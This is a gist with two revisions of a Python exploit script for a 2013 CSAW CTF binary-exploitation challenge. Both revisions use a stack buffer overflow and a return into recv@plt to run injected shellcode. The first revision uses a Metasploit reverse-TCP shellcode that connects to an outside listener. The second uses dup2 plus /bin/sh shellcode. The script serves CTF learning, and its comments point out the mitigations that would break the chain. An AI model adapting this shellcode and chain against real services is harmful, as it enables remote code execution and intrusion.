@Tosainu
Last active February 21, 2017 08:03
#!/usr/bin/env python2
# CSAW CTF Qualification Round 2013: Exploitation3
# http://shell-storm.org/repo/CTF/CSAW-2013/Exploitation/
#
# Revision 1 of the solution. After the login dialogue the script overwrites
# the saved return address of a stack buffer with recv@plt, so the service
# itself reads a second message into the writable .bss region and then
# returns into it. Every value below is tied to this one challenge binary
# (fixed, non-PIE addresses) and to a service listening on localhost:34266.
# From a defensive angle the chain depends on three things at once: a read
# that accepts more than 1056 bytes into a stack buffer (the offset measured
# below), no stack canary between that buffer and the return address, and
# a .bss that is executable at runtime; each of these is an independent
# mitigation. The binary itself is not visible here, so those properties are
# inferred from the fact that the script works, not verified.
from pwn import *
# gdb-peda$ patto 0x476e4131
# 1198407985 found at offset: 1056
# Distance from the start of the overflowed buffer to the saved return
# address, measured with peda's cyclic pattern (raw peda output above).
padding = 1056
# Where the redirected recv() writes stage 2, and the address the chain
# afterwards returns into. Named .bss by the author; its exact bounds and
# permissions are not shown on this page.
addr_bss = 0x804b008
# 08048890 <recv@plt>:
# 8048890: ff 25 f0 af 04 08 jmp DWORD PTR ds:0x804aff0
# 8048896: 68 e0 00 00 00 push 0xe0
# 804889b: e9 20 fe ff ff jmp 80486c0 <setsockopt@plt-0x10>
# PLT stub of recv() (disassembly above); calling through the PLT means no
# libc address has to be known or leaked.
addr_recv_plt = 0x8048890
# msf > use payload/linux/x86/shell_reverse_tcp
# msf payload(shell_reverse_tcp) > generate -t python -o LHOST='0.0.0.0'
# Stage 2: a Metasploit connect-back shell. LHOST 0.0.0.0 is only a
# placeholder, so the connect-back address and port are baked into the bytes
# below; the session therefore appears at an external listener, not on the
# socket this script holds.
shellcode = ''
shellcode += '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66'
shellcode += '\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x00'
shellcode += '\x00\x00\x00\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50'
shellcode += '\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73'
shellcode += '\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0'
shellcode += '\x0b\xcd\x80'
# Plain TCP connection to the challenge service (pwntools tube).
r = remote('localhost', 34266)
# login
# The service's prompts and the fixed credentials handed out with the task.
r.recvuntil('UserName: ')
r.sendline('csaw2013')
r.recvuntil('Password: ')
r.sendline('S1mplePWD')
r.recvuntil('Entry Info: ')
# Presumably the size the service will read next; a negative value appears
# to get past its size check so that the following send() overruns the stack
# buffer -- inferred from the script, not visible in the binary. A signed
# length compared with a signed limit is the usual cause of this pattern.
r.sendline('-1')
# Stage 1: the overflow, laid out as one cdecl call frame after the padding:
#   [ret -> recv@plt][ret after recv -> addr_bss][fd][buf][len][flags]
# i.e. recv(4, addr_bss, len(shellcode), 0), then execution continues at
# addr_bss where the just-received bytes sit.
payload = ''
payload += 'A' * padding
payload += p32(addr_recv_plt)   # overwritten saved return address
payload += p32(addr_bss)        # recv()'s own return address: the new code
payload += p32(4)               # recv arg 1: sockfd -- presumably the client socket, hard-coded
payload += p32(addr_bss)        # recv arg 2: buf
payload += p32(len(shellcode))  # recv arg 3: len, exactly one stage-2 send
payload += p32(0)               # recv arg 4: flags
r.send(payload)
# Discard any buffered output from the service before the redirected recv()
# is fed, so stage 2 is delivered as a single clean message.
r.clean()
r.send(shellcode)
# Keep the original socket open for the user; see the note on the reverse
# shell above for where the resulting session actually shows up.
r.interactive()
#!/usr/bin/env python2
# CSAW CTF Qualification Round 2013: Exploitation3
# http://shell-storm.org/repo/CTF/CSAW-2013/Exploitation/
#
# Revision 2 of the solution. The stack overflow and the recv@plt-into-.bss
# stage are the same as in revision 1; what changed is stage 2: instead of a
# connect-back shell it duplicates the client socket onto stdin/stdout/stderr
# and then executes /bin/sh, so the shell is served over the connection this
# script already holds and r.interactive() at the end is directly usable.
# All addresses are fixed to this one challenge binary (non-PIE) and to a
# service on localhost:34266. The same defensive observations apply: a
# bounded read, a stack canary or a non-executable .bss would each break the
# chain -- inferred from the script, the binary is not visible here.
from pwn import *
# gdb-peda$ patto 0x476e4131
# 1198407985 found at offset: 1056
# Distance from the start of the overflowed buffer to the saved return
# address, measured with peda's cyclic pattern (raw peda output above).
padding = 1056
# Where the redirected recv() writes stage 2, and the address the chain
# afterwards returns into. Named .bss by the author; its exact bounds and
# permissions are not shown on this page.
addr_bss = 0x804b008
# 08048890 <recv@plt>:
# 8048890: ff 25 f0 af 04 08 jmp DWORD PTR ds:0x804aff0
# 8048896: 68 e0 00 00 00 push 0xe0
# 804889b: e9 20 fe ff ff jmp 80486c0 <setsockopt@plt-0x10>
# PLT stub of recv() (disassembly above); calling through the PLT means no
# libc address has to be known or leaked.
addr_recv_plt = 0x8048890
# Descriptor of the client connection inside the service -- presumably
# constant because the service handles one client at a time; hard-coded,
# so both the recv() argument below and the dup2 loop use the same value.
socket_fd = 4
shellcode = ''
# dup2(fd,0); dup2(fd,1); dup2(fd,2);
# http://shell-storm.org/shellcode/files/shellcode-259.php
# Part 1 of stage 2, hand-assembled: the shell-storm listing takes the fd
# from %esi (the two commented-out instructions); this version instead loads
# the known socket_fd directly via lea, then loops ecx over 0, 1, 2 calling
# syscall 0x3f (dup2 on i386) with ebx = socket_fd, ecx = target fd.
shellcode += '\x31\xc9' # xor %ecx,%ecx
# shellcode += '\x56' # push %esi
# shellcode += '\x5b' # pop %ebx
shellcode += '\x8d\x59' + chr(socket_fd) # lea ebx, [ecx + socket_fd]
# loop:
shellcode += '\x6a\x3f' # push $0x3f
shellcode += '\x58' # pop %eax
shellcode += '\xcd\x80' # int $0x80
shellcode += '\x41' # inc %ecx
shellcode += '\x80\xf9\x03' # cmp $0x3,%cl
shellcode += '\x75\xf5' # jne 80483e8 <loop>
# msf > use payload/linux/x86/exec
# msf payload(exec) > generate -b '\x00' -t python -o CMD=/bin/sh
# Part 2 of stage 2: Metasploit's exec payload for /bin/sh, generated with
# '\x00' excluded as a bad character (hence the encoded, non-obvious bytes).
# Since recv() copies raw bytes, the null-free requirement presumably comes
# from a later string operation in the target rather than from recv itself.
shellcode += '\xbb\x55\x28\xf8\x3d\xdd\xc5\xd9\x74\x24\xf4\x5d\x33'
shellcode += '\xc9\xb1\x0b\x31\x5d\x15\x83\xed\xfc\x03\x5d\x11\xe2'
shellcode += '\xa0\x42\xf3\x65\xd3\xc1\x65\xfe\xce\x86\xe0\x19\x78'
shellcode += '\x66\x80\x8d\x78\x10\x49\x2c\x11\x8e\x1c\x53\xb3\xa6'
shellcode += '\x17\x94\x33\x37\x07\xf6\x5a\x59\x78\x85\xf4\xa5\xd1'
shellcode += '\x3a\x8d\x47\x10\x3c'
# Plain TCP connection to the challenge service (pwntools tube).
r = remote('localhost', 34266)
# login
# The service's prompts and the fixed credentials handed out with the task.
r.recvuntil('UserName: ')
r.sendline('csaw2013')
r.recvuntil('Password: ')
r.sendline('S1mplePWD')
r.recvuntil('Entry Info: ')
# Presumably the size the service will read next; a negative value appears
# to get past its size check so that the following send() overruns the stack
# buffer -- inferred from the script, not visible in the binary.
r.sendline('-1')
# Stage 1: the overflow, laid out as one cdecl call frame after the padding:
#   [ret -> recv@plt][ret after recv -> addr_bss][fd][buf][len][flags]
# i.e. recv(socket_fd, addr_bss, len(shellcode), 0), then execution
# continues at addr_bss where the just-received bytes sit.
payload = ''
payload += 'A' * padding
payload += p32(addr_recv_plt)   # overwritten saved return address
payload += p32(addr_bss)        # recv()'s own return address: the new code
payload += p32(socket_fd)       # recv arg 1: sockfd
payload += p32(addr_bss)        # recv arg 2: buf
payload += p32(len(shellcode))  # recv arg 3: len, exactly one stage-2 send
payload += p32(0)               # recv arg 4: flags
r.send(payload)
# Discard any buffered output from the service before the redirected recv()
# is fed, so stage 2 is delivered as a single clean message.
r.clean()
r.send(shellcode)
# With stdin/stdout/stderr dup2'ed onto this socket, the shell talks over the
# same connection, so the interactive session is on r itself.
r.interactive()